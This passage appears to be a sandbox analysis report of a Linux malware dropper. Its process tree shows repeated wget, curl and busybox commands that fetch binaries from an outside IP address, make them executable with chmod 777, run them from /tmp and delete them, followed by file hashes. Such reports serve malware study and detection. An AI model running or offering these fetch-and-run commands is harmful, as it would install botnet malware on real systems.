/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:936
-
-
/bin/chmodchmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB2⤵PID:939
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:940
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:942
-
-
/bin/chmodchmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O2⤵PID:945
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:946
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:948
-
-
/bin/chmodchmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs52⤵PID:951
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:952
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:954
-
-
/bin/chmodchmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey2⤵PID:957
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:958
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:960
-
-
/bin/chmodchmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH42⤵PID:963
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:964
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:966
-
-
/bin/chmodchmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat2⤵PID:969
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:970
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:972
-
-
/bin/chmodchmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy2⤵PID:975
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97